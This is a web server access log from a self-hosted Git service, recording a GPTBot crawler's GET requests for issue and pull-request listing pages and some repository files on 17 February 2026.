"/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md?display=source" [Client 74.7.227.38] [Length 15843] [Gzip 4.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:19:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat?display=source" [Client 74.7.227.38] [Length 13397] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:19:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:19:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10091] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10264] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" +[17/Feb/2026:19:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 11144] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" +[17/Feb/2026:19:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11029] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:19:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache?display=source" [Client 74.7.227.38] [Length 11157] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:19:33:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" +[17/Feb/2026:19:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt?display=rendered" [Client 74.7.227.38] [Length 11033] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.FileListAbsolute.txt" +[17/Feb/2026:19:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache?display=rendered" [Client 74.7.227.38] [Length 11038] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:19:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 